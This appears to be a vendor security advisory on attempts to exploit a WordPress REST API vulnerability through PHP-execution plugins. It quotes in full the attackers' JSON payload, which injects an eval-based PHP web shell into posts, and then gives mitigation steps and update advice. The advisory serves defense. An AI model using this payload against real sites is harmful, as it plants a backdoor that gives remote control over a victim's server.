We are see remote command execution (RCE) attempts trying to exploit the latest WordPress API Vulnerability.
The attackers trying to exploit sites that have plugins like the Insert PHP, Exec-PHP and similar installed plugins. These plugins, allow users to insert PHP code directly into the posts as a way to make customizations easier. Coupled with this vulnerability, it allows the attackers to execute PHP code when injecting their content into the database.
Example payload
Attacker is trying to inject a PHP eval code to posts. This is the payload:
{"content": "<!-- [insert_php]if (isset($_REQUEST[\"MKbJh\"])){eval($_REQUEST[\"MKbJh\"]);exit;}[/insert_php][php]if (isset($_REQUEST[\"MKbJh\"])){eval($_REQUEST[\"MKbJh\"]);exit;}[/php] -->"}
It tries to leverage the format parsed by these plugins to include code and later execute any code with POST Payload.
Strategy
First of all, if you have any of these plugins, we recommend disabling them. We believe that PHP code should be run within a plugin or theme. It should not be run directly from the posts.
Second, it seems attackers are starting to think of ways to monetize this vulnerability. What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections.
Third – update to WordPress 4.7.2 now!
Final words
Websites that using Malware Expert – ModSecurity rules are protected against this threat.